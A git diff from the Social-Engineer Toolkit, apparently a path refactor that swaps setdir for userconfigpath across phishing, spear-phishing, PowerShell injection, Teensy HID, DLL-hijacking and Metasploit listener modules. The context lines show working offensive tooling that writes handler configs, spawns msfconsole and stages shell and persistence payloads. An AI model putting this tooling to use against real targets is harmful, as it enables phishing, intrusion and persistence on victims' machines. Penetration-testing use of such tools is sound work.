|
||||
shutil.copyfile(setdir + "/web_clone/index.html",
|
||||
setdir + "/web_clone/site.html")
|
||||
filewrite = open(setdir + "/web_clone/index.html", "w")
|
||||
if os.path.isfile(userconfigpath + "web_clone/site.html"):
|
||||
os.remove(userconfigpath + "web_clone/site.html")
|
||||
shutil.copyfile(userconfigpath + "web_clone/index.html",
|
||||
userconfigpath + "web_clone/site.html")
|
||||
filewrite = open(userconfigpath + "web_clone/index.html", "w")
|
||||
filewrite.write(docbase)
|
||||
filewrite.close()
|
||||
|
||||
|
@ -288,7 +288,7 @@ def web_server_start():
|
|||
import src.core.webserver as webserver
|
||||
# specify the path for the SET web directories for the applet
|
||||
# attack
|
||||
path = (setdir + "/web_clone/")
|
||||
path = (userconfigpath + "web_clone/")
|
||||
try:
|
||||
import multiprocessing
|
||||
p = multiprocessing.Process(
|
||||
|
@ -320,7 +320,7 @@ def web_server_start():
|
|||
import src.core.webserver as webserver
|
||||
# specify the path for the SET web directories for the
|
||||
# applet attack
|
||||
path = (setdir + "/web_clone/")
|
||||
path = (userconfigpath + "web_clone/")
|
||||
p = multiprocessing.Process(
|
||||
target=webserver.start_server, args=(web_port, path))
|
||||
p.start()
|
||||
|
@ -350,7 +350,7 @@ def web_server_start():
|
|||
|
||||
if apache == 1:
|
||||
subprocess.Popen("cp %s/src/html/*.bin %s 1> /dev/null 2> /dev/null;cp %s/src/html/*.html %s 1> /dev/null 2> /dev/null;cp %s/web_clone/* %s 1> /dev/null 2> /dev/null;cp %s/msf.exe %s 1> /dev/null 2> /dev/null;cp %s/*.jar %s 1> /dev/null 2> /dev/null" %
|
||||
(definepath, apache_path, definepath, apache_path, setdir, apache_path, setdir, apache_path, setdir, apache_path), shell=True).wait()
|
||||
(definepath, apache_path, definepath, apache_path, userconfigpath, apache_path, userconfigpath, apache_path, userconfigpath, apache_path), shell=True).wait()
|
||||
# if we are tracking users
|
||||
if track_email == "on":
|
||||
now = datetime.datetime.today()
|
||||
|
@ -395,15 +395,15 @@ web_server = check_config("WEB_PORT=")
|
|||
|
||||
# setup multi attack options here
|
||||
multiattack = "off"
|
||||
if os.path.isfile(setdir + "/multi_tabnabbing"):
|
||||
if os.path.isfile(userconfigpath + "multi_tabnabbing"):
|
||||
multiattack = "on"
|
||||
if os.path.isfile(setdir + "/multi_harvester"):
|
||||
if os.path.isfile(userconfigpath + "multi_harvester"):
|
||||
multiattack = "on"
|
||||
|
||||
# Grab custom or set defined
|
||||
template = ""
|
||||
if os.path.isfile(setdir + "/site.template"):
|
||||
fileopen = open(setdir + "/site.template", "r").readlines()
|
||||
if os.path.isfile(userconfigpath + "site.template"):
|
||||
fileopen = open(userconfigpath + "site.template", "r").readlines()
|
||||
for line in fileopen:
|
||||
line = line.rstrip()
|
||||
match = re.search("TEMPLATE=", line)
|
||||
|
@ -532,8 +532,8 @@ try:
|
|||
print((
|
||||
bcolors.GREEN + "[--] Apache web server is currently in use for performance. [--]" + bcolors.ENDC))
|
||||
|
||||
if os.path.isfile(setdir + "/meta_config"):
|
||||
fileopen = open(setdir + "/meta_config", "r")
|
||||
if os.path.isfile(userconfigpath + "meta_config"):
|
||||
fileopen = open(userconfigpath + "meta_config", "r")
|
||||
for line in fileopen:
|
||||
line = line.rstrip()
|
||||
match = re.search("set SRVPORT 80", line)
|
||||
|
@ -550,8 +550,8 @@ try:
|
|||
|
||||
web_server_start()
|
||||
# if we are using ettercap
|
||||
if os.path.isfile(setdir + "/ettercap"):
|
||||
fileopen5 = open(setdir + "/ettercap", "r")
|
||||
if os.path.isfile(userconfigpath + "ettercap"):
|
||||
fileopen5 = open(userconfigpath + "ettercap", "r")
|
||||
for line in fileopen5:
|
||||
ettercap = line.rstrip()
|
||||
# run in background
|
||||
|
@ -561,7 +561,7 @@ try:
|
|||
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
|
||||
|
||||
# if metasploit config is in directory
|
||||
if os.path.isfile(setdir + "/meta_config"):
|
||||
if os.path.isfile(userconfigpath + "meta_config"):
|
||||
print_info("Launching MSF Listener...")
|
||||
print_info("This may take a few to load MSF...")
|
||||
# this checks to see if we want to start a listener
|
||||
|
@ -573,12 +573,12 @@ try:
|
|||
import pexpect
|
||||
# specify if we are using the multi pyinjector
|
||||
meta_config = "meta_config"
|
||||
if os.path.isfile(setdir + "/meta_config_multipyinjector"):
|
||||
if os.path.isfile(userconfigpath + "meta_config_multipyinjector"):
|
||||
meta_config = "meta_config_multipyinjector"
|
||||
# if we arent using a custom payload
|
||||
if custom != 1:
|
||||
child1 = pexpect.spawn(
|
||||
"%smsfconsole -r %s/%s\r\n\r\n" % (msf_path, setdir, meta_config))
|
||||
"%smsfconsole -r %s/%s\r\n\r\n" % (msf_path, userconfigpath, meta_config))
|
||||
# check if we want to deliver emails or track users that click the
|
||||
# link
|
||||
webattack_email = check_config("WEBATTACK_EMAIL=").lower()
|
||||
|
@ -592,11 +592,11 @@ try:
|
|||
if custom != 1:
|
||||
child1.interact()
|
||||
|
||||
if os.path.isfile(setdir + "/set.payload"):
|
||||
if os.path.isfile(userconfigpath + "set.payload"):
|
||||
port = check_options("PORT=")
|
||||
|
||||
# grab configuration
|
||||
fileopen = open(setdir + "/set.payload", "r")
|
||||
fileopen = open(userconfigpath + "set.payload", "r")
|
||||
for line in fileopen:
|
||||
set_payload = line.rstrip()
|
||||
|
||||
|
@ -627,12 +627,12 @@ try:
|
|||
|
||||
# if not then run it in windows
|
||||
if operating_system == "windows":
|
||||
if not os.path.isfile(setdir + "/ratteserver.exe"):
|
||||
if not os.path.isfile(userconfigpath + "ratteserver.exe"):
|
||||
shutil.copyfile(
|
||||
"../../payloads/ratte/ratteserver.binary", setdir + "/ratteserver.exe")
|
||||
"../../payloads/ratte/ratteserver.binary", userconfigpath + "ratteserver.exe")
|
||||
shutil.copyfile(
|
||||
"../../payloads/ratte/cygwin1.dll", setdir + "/cygwin1.dll")
|
||||
os.system(setdir + "/ratteserver %s" % (definepath, port))
|
||||
"../../payloads/ratte/cygwin1.dll", userconfigpath + "cygwin1.dll")
|
||||
os.system(userconfigpath + "ratteserver %s" % (definepath, port))
|
||||
|
||||
# handle errors
|
||||
except Exception as e:
|
||||
|
|
|
@ -26,7 +26,7 @@ auto_migrate = check_config("AUTO_MIGRATE=")
|
|||
pyinjection = check_options("PYINJECTION=")
|
||||
if pyinjection == "ON":
|
||||
# check to ensure that the payload options were specified right
|
||||
if os.path.isfile(setdir + "/payload_options.shellcode"):
|
||||
if os.path.isfile(userconfigpath + "payload_options.shellcode"):
|
||||
pyinjection = "on"
|
||||
print_status(
|
||||
"Multi/Pyinjection was specified. Overriding config options.")
|
||||
|
@ -56,7 +56,7 @@ if validate_ip(ipaddr) == False:
|
|||
|
||||
# prompt what port to listen on for powershell then make an append to the current
|
||||
# metasploit answer file
|
||||
if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)):
|
||||
if os.path.isfile("%s/meta_config_multipyinjector" % (userconfigpath)):
|
||||
# if we have multi injection on, don't worry about these
|
||||
if multi_injection != "on":
|
||||
if pyinjection == "off":
|
||||
|
@ -66,12 +66,12 @@ if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)):
|
|||
["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
|
||||
if port == "":
|
||||
port = "443"
|
||||
fileopen = open("%s/meta_config_multipyinjector" % (setdir), "r")
|
||||
fileopen = open("%s/meta_config_multipyinjector" % (userconfigpath), "r")
|
||||
data = fileopen.read()
|
||||
match = re.search(port, data)
|
||||
if not match:
|
||||
filewrite = open(
|
||||
"%s/meta_config_multipyinjector" % (setdir), "a")
|
||||
"%s/meta_config_multipyinjector" % (userconfigpath), "a")
|
||||
filewrite.write("\nuse exploit/multi/handler\n")
|
||||
if auto_migrate == "ON":
|
||||
filewrite.write(
|
||||
|
@ -84,7 +84,7 @@ if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)):
|
|||
if multi_injection != "on":
|
||||
if pyinjection == "off":
|
||||
# check to see if the meta config multi pyinjector is there
|
||||
if not os.path.isfile("%s/meta_config_multipyinjector" % (setdir)):
|
||||
if not os.path.isfile("%s/meta_config_multipyinjector" % (userconfigpath)):
|
||||
if check_options("PORT=") != 0:
|
||||
port = check_options("PORT=")
|
||||
# if port.options isnt there then prompt
|
||||
|
@ -128,12 +128,12 @@ if multi_injection == "on":
|
|||
generate_powershell_alphanumeric_payload(
|
||||
powershell_inject_x86, ipaddr, ports, x86)
|
||||
|
||||
if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)):
|
||||
if os.path.isfile("%s/meta_config_multipyinjector" % (userconfigpath)):
|
||||
port_check = check_ports(
|
||||
"%s/meta_config_multipyinjector" % (setdir), ports)
|
||||
"%s/meta_config_multipyinjector" % (userconfigpath), ports)
|
||||
if port_check == False:
|
||||
filewrite = open(
|
||||
"%s/meta_config_multipyinjector" % (setdir), "a")
|
||||
"%s/meta_config_multipyinjector" % (userconfigpath), "a")
|
||||
filewrite.write("\nuse exploit/multi/handler\n")
|
||||
if auto_migrate == "ON":
|
||||
filewrite.write(
|
||||
|
@ -143,15 +143,15 @@ if multi_injection == "on":
|
|||
filewrite.close()
|
||||
|
||||
# if we aren't using multi pyinjector
|
||||
if not os.path.isfile("%s/meta_config_multipyinjector" % (setdir)):
|
||||
if not os.path.isfile("%s/meta_config_multipyinjector" % (userconfigpath)):
|
||||
# if meta config isn't created yet then create it
|
||||
if not os.path.isfile("%s/meta_config" % (setdir)):
|
||||
filewrite = open("%s/meta_config" % (setdir), "w")
|
||||
if not os.path.isfile("%s/meta_config" % (userconfigpath)):
|
||||
filewrite = open("%s/meta_config" % (userconfigpath), "w")
|
||||
filewrite.write("")
|
||||
filewrite.close()
|
||||
port_check = check_ports("%s/meta_config" % (setdir), ports)
|
||||
port_check = check_ports("%s/meta_config" % (userconfigpath), ports)
|
||||
if port_check == False:
|
||||
filewrite = open("%s/meta_config" % (setdir), "a")
|
||||
filewrite = open("%s/meta_config" % (userconfigpath), "a")
|
||||
filewrite.write("\nuse exploit/multi/handler\n")
|
||||
if auto_migrate == "ON":
|
||||
filewrite.write(
|
||||
|
@ -164,7 +164,7 @@ if multi_injection == "on":
|
|||
if pyinjection == "on":
|
||||
multi_injection_x86 = ""
|
||||
# read in the file we need for parsing
|
||||
fileopen = open(setdir + "/payload_options.shellcode", "r")
|
||||
fileopen = open(userconfigpath + "payload_options.shellcode", "r")
|
||||
payloads = fileopen.read()[:-1].rstrip() # strips an extra ,
|
||||
payloads = payloads.split(",")
|
||||
# format: payload<space>port
|
||||
|
@ -196,7 +196,7 @@ if verbose.lower() == "on":
|
|||
time.sleep(3)
|
||||
print(x86)
|
||||
|
||||
filewrite = open("%s/x86.powershell" % (setdir), "w")
|
||||
filewrite = open("%s/x86.powershell" % (userconfigpath), "w")
|
||||
filewrite.write(x86)
|
||||
filewrite.close()
|
||||
print_status("Finished generating powershell injection bypass.")
|
||||
|
|
|
@ -17,10 +17,10 @@ definepath = os.getcwd()
|
|||
sys.path.append(definepath)
|
||||
|
||||
# cleanup
|
||||
if os.path.isfile(setdir + "/uac.address"):
|
||||
os.remove(setdir + "/uac.address")
|
||||
if os.path.isfile(setdir + "/system.address"):
|
||||
os.remove(setdir + "/system.address")
|
||||
if os.path.isfile(userconfigpath + "uac.address"):
|
||||
os.remove(userconfigpath + "uac.address")
|
||||
if os.path.isfile(userconfigpath + "system.address"):
|
||||
os.remove(userconfigpath + "system.address")
|
||||
|
||||
# will remove this later
|
||||
core_modules = True
|
||||
|
@ -863,9 +863,9 @@ Example: shellcode <enter> - Then paste your shellcode \x41\x41\etc
|
|||
time.sleep(0.5)
|
||||
|
||||
# write out system
|
||||
if os.path.isfile("%s/system.address" % (setdir)):
|
||||
os.remove("%s/system.address" % (setdir))
|
||||
filewrite = open("%s/system.address" % (setdir), "w")
|
||||
if os.path.isfile("%s/system.address" % (userconfigpath)):
|
||||
os.remove("%s/system.address" % (userconfigpath))
|
||||
filewrite = open("%s/system.address" % (userconfigpath), "w")
|
||||
filewrite.write(addr)
|
||||
filewrite.close()
|
||||
|
||||
|
@ -882,9 +882,9 @@ Example: shellcode <enter> - Then paste your shellcode \x41\x41\etc
|
|||
# had to do some funky stuff here because global vars are not working properly
|
||||
# inside threads, so the information cant be passed to
|
||||
# normal outside routines
|
||||
if os.path.isfile(setdir + "/uac.address"):
|
||||
os.remove(setdir + "/uac.address")
|
||||
filewrite = open(setdir + "/uac.address", "w")
|
||||
if os.path.isfile(userconfigpath + "uac.address"):
|
||||
os.remove(userconfigpath + "uac.address")
|
||||
filewrite = open(userconfigpath + "uac.address", "w")
|
||||
filewrite.write(addr)
|
||||
filewrite.close()
|
||||
|
||||
|
@ -1033,9 +1033,9 @@ Example: shellcode <enter> - Then paste your shellcode \x41\x41\etc
|
|||
if os.path.isfile("src/payloads/set_payloads/persistence.binary"):
|
||||
if core_modules == True:
|
||||
subprocess.Popen(
|
||||
"cp src/payloads/set_payloads/persistence.binary %s" % (setdir), shell=True).wait()
|
||||
upx("%s/persistence.binary" % (setdir))
|
||||
upload = "%s/persistence.binary" % (setdir)
|
||||
"cp src/payloads/set_payloads/persistence.binary %s" % (userconfigpath), shell=True).wait()
|
||||
upx("%s/persistence.binary" % (userconfigpath))
|
||||
upload = "%s/persistence.binary" % (userconfigpath)
|
||||
if core_modules == False:
|
||||
upload = "src/payloads/set_payloads/persistence.binary"
|
||||
|
||||
|
@ -1085,9 +1085,9 @@ Example: shellcode <enter> - Then paste your shellcode \x41\x41\etc
|
|||
if os.path.isfile("src/payloads/set_payloads/shell.windows"):
|
||||
if core_modules == True:
|
||||
subprocess.Popen(
|
||||
"cp src/payloads/set_payloads/shell.windows %s" % (setdir), shell=True).wait()
|
||||
upx(setdir + "/shell.windows")
|
||||
upload = setdir + "/shell.windows"
|
||||
"cp src/payloads/set_payloads/shell.windows %s" % (userconfigpath), shell=True).wait()
|
||||
upx(userconfigpath + "shell.windows")
|
||||
upload = userconfigpath + "shell.windows"
|
||||
if core_modules == False:
|
||||
upload = "src/payloads/set_payloads/shell.windows"
|
||||
|
||||
|
@ -1437,8 +1437,8 @@ Example: shellcode <enter> - Then paste your shellcode \x41\x41\etc
|
|||
# if we have a windows shell
|
||||
if data == "IHAYYYYYIAMSETANDIAMWINDOWS":
|
||||
|
||||
if os.path.isfile(setdir + "/system.address"):
|
||||
fileopen = open(setdir + "/system.address", "r")
|
||||
if os.path.isfile(userconfigpath + "system.address"):
|
||||
fileopen = open(userconfigpath + "system.address", "r")
|
||||
system = fileopen.read().rstrip()
|
||||
system = system.replace(":WINDOWS", "")
|
||||
system = system.replace(":UAC-SAFE", "")
|
||||
|
@ -1446,8 +1446,8 @@ Example: shellcode <enter> - Then paste your shellcode \x41\x41\etc
|
|||
temp_addr = str(addr[0] + ":WINDOWS:SYSTEM")
|
||||
bypass_counter = 1
|
||||
|
||||
if os.path.isfile(setdir + "/uac.address"):
|
||||
fileopen = open(setdir + "/uac.address", "r")
|
||||
if os.path.isfile(userconfigpath + "uac.address"):
|
||||
fileopen = open(userconfigpath + "uac.address", "r")
|
||||
uac = fileopen.read().rstrip()
|
||||
uac = uac.replace(":WINDOWS", "")
|
||||
if str(addr[0]) == str(uac):
|
||||
|
@ -1479,12 +1479,12 @@ Example: shellcode <enter> - Then paste your shellcode \x41\x41\etc
|
|||
|
||||
# reset value
|
||||
# if uac != None:
|
||||
if os.path.isfile(setdir + "/uac.address"):
|
||||
os.remove(setdir + "/uac.address")
|
||||
if os.path.isfile(userconfigpath + "uac.address"):
|
||||
os.remove(userconfigpath + "uac.address")
|
||||
bypass_counter = 0
|
||||
|
||||
if os.path.isfile(setdir + "/system.address"):
|
||||
os.remove(setdir + "/system.address")
|
||||
if os.path.isfile(userconfigpath + "system.address"):
|
||||
os.remove(userconfigpath + "system.address")
|
||||
bypass_counter = 0
|
||||
|
||||
if addr[0] != "127.0.0.1":
|
||||
|
|
|
@ -109,41 +109,41 @@ print_info(
|
|||
"As an added bonus, use the file-format creator in SET to create your attachment.")
|
||||
counter = 0
|
||||
# PDF Previous
|
||||
if os.path.isfile(setdir + "/template.pdf"):
|
||||
if os.path.isfile(setdir + "/template.rar"):
|
||||
if os.path.isfile(setdir + "/template.zip"):
|
||||
if os.path.isfile(userconfigpath + "template.pdf"):
|
||||
if os.path.isfile(userconfigpath + "template.rar"):
|
||||
if os.path.isfile(userconfigpath + "template.zip"):
|
||||
print_warning("Multiple payloads were detected:")
|
||||
print ("1. PDF Payload\n2. VBS Payload\n3. Zipfile Payload\n\n")
|
||||
choose_payload = input(setprompt("0", ""))
|
||||
if choose_payload == '1':
|
||||
file_format = (setdir + "/template.pdf")
|
||||
file_format = (userconfigpath + "template.pdf")
|
||||
if choose_payload == '2':
|
||||
file_format = (setdir + "/template.rar")
|
||||
file_format = (userconfigpath + "template.rar")
|
||||
if choose_payload == '3':
|
||||
file_format = (setdir + "/template.zip")
|
||||
file_format = (userconfigpath + "template.zip")
|
||||
counter = 1
|
||||
|
||||
if counter == 0:
|
||||
if os.path.isfile(setdir + "/template.pdf"):
|
||||
file_format = (setdir + "/template.pdf")
|
||||
if os.path.isfile(setdir + "/template.rar"):
|
||||
file_format = (setdir + "/template.rar")
|
||||
if os.path.isfile(setdir + "/template.zip"):
|
||||
file_format = (setdir + "/template.zip")
|
||||
if os.path.isfile(setdir + "/template.doc"):
|
||||
file_format = (setdir + "/template.doc")
|
||||
if os.path.isfile(setdir + "/template.rtf"):
|
||||
file_format = (setdir + "/template.rtf")
|
||||
if os.path.isfile(setdir + "/template.mov"):
|
||||
file_format = (setdir + "/template.mov")
|
||||
if os.path.isfile(userconfigpath + "template.pdf"):
|
||||
file_format = (userconfigpath + "template.pdf")
|
||||
if os.path.isfile(userconfigpath + "template.rar"):
|
||||
file_format = (userconfigpath + "template.rar")
|
||||
if os.path.isfile(userconfigpath + "template.zip"):
|
||||
file_format = (userconfigpath + "template.zip")
|
||||
if os.path.isfile(userconfigpath + "template.doc"):
|
||||
file_format = (userconfigpath + "template.doc")
|
||||
if os.path.isfile(userconfigpath + "template.rtf"):
|
||||
file_format = (userconfigpath + "template.rtf")
|
||||
if os.path.isfile(userconfigpath + "template.mov"):
|
||||
file_format = (userconfigpath + "template.mov")
|
||||
|
||||
# Determine if prior payload created
|
||||
if not os.path.isfile(setdir + "/template.pdf"):
|
||||
if not os.path.isfile(setdir + "/template.rar"):
|
||||
if not os.path.isfile(setdir + "/template.zip"):
|
||||
if not os.path.isfile(setdir + "/template.doc"):
|
||||
if not os.path.isfile(setdir + "/template.rtf"):
|
||||
if not os.path.isfile(setdir + "/template.mov"):
|
||||
if not os.path.isfile(userconfigpath + "template.pdf"):
|
||||
if not os.path.isfile(userconfigpath + "template.rar"):
|
||||
if not os.path.isfile(userconfigpath + "template.zip"):
|
||||
if not os.path.isfile(userconfigpath + "template.doc"):
|
||||
if not os.path.isfile(userconfigpath + "template.rtf"):
|
||||
if not os.path.isfile(userconfigpath + "template.mov"):
|
||||
print("No previous payload created.")
|
||||
file_format = input(
|
||||
setprompt(["1"], "Enter the file to use as an attachment"))
|
||||
|
@ -175,8 +175,8 @@ if filename1 == '1' or filename1 == '':
|
|||
if filename1 == '2':
|
||||
filename1 = input(setprompt(["1"], "New filename"))
|
||||
subprocess.Popen("cp %s %s/%s 1> /dev/null 2> /dev/null" %
|
||||
(file_format, setdir, filename1), shell=True).wait()
|
||||
file_format = ("%s/%s" % (setdir, filename1))
|
||||
(file_format, userconfigpath, filename1), shell=True).wait()
|
||||
file_format = ("%s/%s" % (userconfigpath, filename1))
|
||||
print_status("Filename changed, moving on...")
|
||||
|
||||
print ("""
|
||||
|
@ -210,7 +210,7 @@ if option1 == '1' or option1 == '2':
|
|||
if template_choice == '1':
|
||||
# set path for
|
||||
path = 'src/templates/'
|
||||
filewrite = open(setdir + "/email.templates", "w")
|
||||
filewrite = open(userconfigpath + "email.templates", "w")
|
||||
counter = 0
|
||||
# Pull all files in the templates directory
|
||||
for infile in glob.glob(os.path.join(path, '*.template')):
|
||||
|
@ -223,7 +223,7 @@ if option1 == '1' or option1 == '2':
|
|||
# close the file
|
||||
filewrite.close()
|
||||
# read in formatted filenames
|
||||
fileread = open(setdir + "/email.templates", "r").readlines()
|
||||
fileread = open(userconfigpath + "email.templates", "r").readlines()
|
||||
print_info("Available templates:")
|
||||
for line in fileread:
|
||||
line = line.rstrip()
|
||||
|
@ -459,31 +459,31 @@ if option1 == '2':
|
|||
email_num = email_num + 1
|
||||
print(" Sent e-mail number: " + (str(email_num)))
|
||||
|
||||
if not os.path.isfile(setdir + "/template.zip"):
|
||||
if not os.path.isfile(userconfigpath + "template.zip"):
|
||||
print_status("SET has finished delivering the emails")
|
||||
question1 = yesno_prompt(["1"], "Setup a listener [yes|no]")
|
||||
if question1 == 'YES':
|
||||
if not os.path.isfile(setdir + "/payload.options"):
|
||||
if not os.path.isfile(setdir + "/meta_config"):
|
||||
if not os.path.isfile(setdir + "/unc_config"):
|
||||
if not os.path.isfile(userconfigpath + "payload.options"):
|
||||
if not os.path.isfile(userconfigpath + "meta_config"):
|
||||
if not os.path.isfile(userconfigpath + "unc_config"):
|
||||
print_error(
|
||||
"Sorry, you did not generate your payload through SET, this option is not supported.")
|
||||
if os.path.isfile(setdir + "/unc_config"):
|
||||
if os.path.isfile(userconfigpath + "unc_config"):
|
||||
child = pexpect.spawn(
|
||||
"%smsfconsole -r %s/unc_config" % (meta_path, setdir))
|
||||
"%smsfconsole -r %s/unc_config" % (meta_path, userconfigpath))
|
||||
try:
|
||||
child.interact()
|
||||
except Exception:
|
||||
child.close()
|
||||
|
||||
if os.path.isfile(setdir + "/payload.options"):
|
||||
fileopen = open(setdir + "/payload.options", "r").readlines()
|
||||
if os.path.isfile(userconfigpath + "payload.options"):
|
||||
fileopen = open(userconfigpath + "payload.options", "r").readlines()
|
||||
for line in fileopen:
|
||||
line = line.rstrip()
|
||||
line = line.split(" ")
|
||||
|
||||
# CREATE THE LISTENER HERE
|
||||
filewrite = open(setdir + "/meta_config", "w")
|
||||
filewrite = open(userconfigpath + "meta_config", "w")
|
||||
filewrite.write("use exploit/multi/handler\n")
|
||||
filewrite.write("set PAYLOAD " + line[0] + "\n")
|
||||
filewrite.write("set LHOST " + line[1] + "\n")
|
||||
|
@ -493,7 +493,7 @@ if not os.path.isfile(setdir + "/template.zip"):
|
|||
filewrite.write("exploit -j\r\n\r\n")
|
||||
filewrite.close()
|
||||
child = pexpect.spawn(
|
||||
"%smsfconsole -r %s/meta_config" % (meta_path, setdir))
|
||||
"%smsfconsole -r %s/meta_config" % (meta_path, userconfigpath))
|
||||
try:
|
||||
child.interact()
|
||||
except Exception:
|
||||
|
|
|
@ -308,24 +308,24 @@ Keyboard.send_now();
|
|||
}""" % (random_filename,random_filename,powershell_command,vbs,bat,vbs,vbs,random_filename,alpha_payload,bat,vbs))
|
||||
# delete temporary file
|
||||
subprocess.Popen("rm %s 1> /dev/null 2>/dev/null" % (random_filename), shell=True).wait()
|
||||
if not os.path.isdir(setdir + "reports"): os.makedirs(setdir + "reports")
|
||||
print_status("Binary to Teensy file exported as %sreports/binary2teensy" % (setdir))
|
||||
if not os.path.isdir(userconfigpath + "reports"): os.makedirs(userconfigpath + "reports")
|
||||
print_status("Binary to Teensy file exported as %sreports/binary2teensy" % (userconfigpath))
|
||||
# write the teensy.ino file out
|
||||
filewrite = file(setdir + "reports/binary2teensy.ino", "w")
|
||||
filewrite = file(userconfigpath + "reports/binary2teensy.ino", "w")
|
||||
# write the teensy.ino file out
|
||||
filewrite.write(output_variable)
|
||||
# close the file
|
||||
filewrite.close()
|
||||
print_status("Generating a listener...")
|
||||
# create our metasploit answer file
|
||||
filewrite = file(setdir + "answer.txt", "w")
|
||||
filewrite = file(userconfigpath + "answer.txt", "w")
|
||||
filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\n%s\nexploit -j" % (payload,ipaddr,port,url))
|
||||
filewrite.close()
|
||||
# spawn a multi/handler listener
|
||||
subprocess.Popen("msfconsole -r %sanswer.txt" % (setdir), shell=True).wait()
|
||||
subprocess.Popen("msfconsole -r %sanswer.txt" % (userconfigpath), shell=True).wait()
|
||||
print_status("[*] Housekeeping old files...")
|
||||
# if our answer file is still there (which it should be), then remove it
|
||||
if os.path.isfile(setdir + "answer.txt"):
|
||||
if os.path.isfile(userconfigpath + "answer.txt"):
|
||||
# remove the old file, no longer used once we've exited
|
||||
subprocess.Popen("rm " + setdir + "answer.txt", shell=True).wait()
|
||||
subprocess.Popen("rm " + userconfigpath + "answer.txt", shell=True).wait()
|
||||
|
||||
|
|
|
@ -29,7 +29,7 @@ now = datetime.datetime.today()
|
|||
if operating_system != "windows":
|
||||
import pexpect
|
||||
|
||||
# check to see if setdir is created
|
||||
# check to see if userconfigpath is created
|
||||
if not os.path.isdir(os.path.join(core.userconfigpath, "reports")):
|
||||
os.makedirs(os.path.join(core.userconfigpath, "reports"))
|
||||
|
||||
|
@ -84,7 +84,7 @@ with open(os.path.join(core.userconfigpath, "teensy")) as fileopen:
|
|||
|
||||
def writefile(filename, now):
|
||||
with open(os.path.join("src/teensy/" + filename)) as fileopen, \
|
||||
open(os.path.join(core.userconfigpath, "/reports/teensy_{0}.ino".format(now)), "w") as filewrite:
|
||||
open(os.path.join(core.userconfigpath, "reports/teensy_{0}.ino".format(now)), "w") as filewrite:
|
||||
|
||||
for line in fileopen:
|
||||
match = re.search("IPADDR", line)
|
||||
|
|
|
@ -13,15 +13,15 @@ port = ""
|
|||
# see if multi_attack is being used and prep everything we need
|
||||
multiattack = "off"
|
||||
webdav_enabled = "off"
|
||||
if os.path.isfile(setdir + "/multi_payload"):
|
||||
if os.path.isfile(userconfigpath + "multi_payload"):
|
||||
multiattack = "on"
|
||||
# just need a simple filewrite to generate a file if webdav is enabled
|
||||
# this is used for multi attack, it will write out file to program junk
|
||||
# then a simple check will determine if webdav is enabled for the port
|
||||
webdav_enabled = "off"
|
||||
webdav_write = open(setdir + "/webdav_enabled", "w")
|
||||
webdav_write = open(userconfigpath + "webdav_enabled", "w")
|
||||
|
||||
fileopen = open(setdir + "/multi_payload", "r")
|
||||
fileopen = open(userconfigpath + "multi_payload", "r")
|
||||
for line in fileopen:
|
||||
match = re.search("MAIN=", line)
|
||||
if match:
|
||||
|
@ -60,8 +60,8 @@ for line in configfile:
|
|||
|
||||
# grab attack vector
|
||||
attack_vector = ""
|
||||
if os.path.isfile(setdir + "/attack_vector"):
|
||||
fileopen = open(setdir + "/attack_vector")
|
||||
if os.path.isfile(userconfigpath + "attack_vector"):
|
||||
fileopen = open(userconfigpath + "attack_vector")
|
||||
for line in fileopen:
|
||||
attack_vector = line.rstrip()
|
||||
|
||||
|
@ -107,10 +107,10 @@ if multiattack == "off":
|
|||
port = "443"
|
||||
|
||||
# check to see if we need to use the multi attack vector in java
|
||||
if not os.path.isfile(setdir + "/multi_java"):
|
||||
filewrite = open(setdir + "/meta_config", "w")
|
||||
if os.path.isfile(setdir + "/multi_java"):
|
||||
filewrite = open(setdir + "/meta_config", "a")
|
||||
if not os.path.isfile(userconfigpath + "multi_java"):
|
||||
filewrite = open(userconfigpath + "meta_config", "w")
|
||||
if os.path.isfile(userconfigpath + "multi_java"):
|
||||
filewrite = open(userconfigpath + "meta_config", "a")
|
||||
|
||||
filewrite.write("use " + exploit + "\n")
|
||||
filewrite.write("set PAYLOAD " + choice1 + "\n")
|
||||
|
@ -160,10 +160,10 @@ filewrite.write("set ExitOnSession false\n")
|
|||
|
||||
# if we are using multiple meterpreter multiscripts
|
||||
if meterpreter_multi == "ON":
|
||||
multiwrite = open(setdir + "/multi_meter.file", "w")
|
||||
multiwrite = open(userconfigpath + "multi_meter.file", "w")
|
||||
multiwrite.write(meterpreter_multi_command)
|
||||
filewrite.write(
|
||||
"set InitialAutorunScript multiscript -rc %s/multi_meter.file\n" % (setdir))
|
||||
"set InitialAutorunScript multiscript -rc %s/multi_meter.file\n" % (userconfigpath))
|
||||
multiwrite.close()
|
||||
|
||||
# auto migration
|
||||
|
@ -180,6 +180,6 @@ if webdav_enabled == "on":
|
|||
# this basically sets a flag we need to make some custom changes in web_server.py to get
|
||||
# the docbase exploit to work properly
|
||||
if exploit == ("windows/browser/java_docbase_bof"):
|
||||
filewrite = open(setdir + "/docbase.file", "w")
|
||||
filewrite = open(userconfigpath + "docbase.file", "w")
|
||||
filewrite.write("DOCBASE=ON")
|
||||
filewrite.close()
|
||||
|
|
|
@ -60,7 +60,7 @@ for line in fileopen:
|
|||
print("\n [*] You have selected the file extension of %s and vulnerable dll of %s" % (extension, dll))
|
||||
|
||||
# prep the directories
|
||||
subprocess.Popen("mkdir " + setdir + "/dll", stdout=subprocess.PIPE,
|
||||
subprocess.Popen("mkdir " + userconfigpath + "dll", stdout=subprocess.PIPE,
|
||||
stderr=subprocess.PIPE, shell=True).wait()
|
||||
filename1 = input(setprompt(
|
||||
["2", "15"], "Enter the filename for the attack (example:openthis) [openthis]"))
|
||||
|
@ -68,7 +68,7 @@ if filename1 == "":
|
|||
filename1 = "openthis"
|
||||
|
||||
# move the files there using the correct extension and file type
|
||||
filewrite = open(setdir + "/dll/%s%s" % (filename1, extension), "w")
|
||||
filewrite = open(userconfigpath + "dll/%s%s" % (filename1, extension), "w")
|
||||
filewrite.write("EMPTY")
|
||||
filewrite.close()
|
||||
|
||||
|
@ -82,7 +82,7 @@ else:
|
|||
fileopen = open("src/webattack/dll_hijacking/hijacking.dll", "rb")
|
||||
data = fileopen.read()
|
||||
|
||||
filewrite = open(setdir + "/dll/%s" % (dll), "wb")
|
||||
filewrite = open(userconfigpath + "dll/%s" % (dll), "wb")
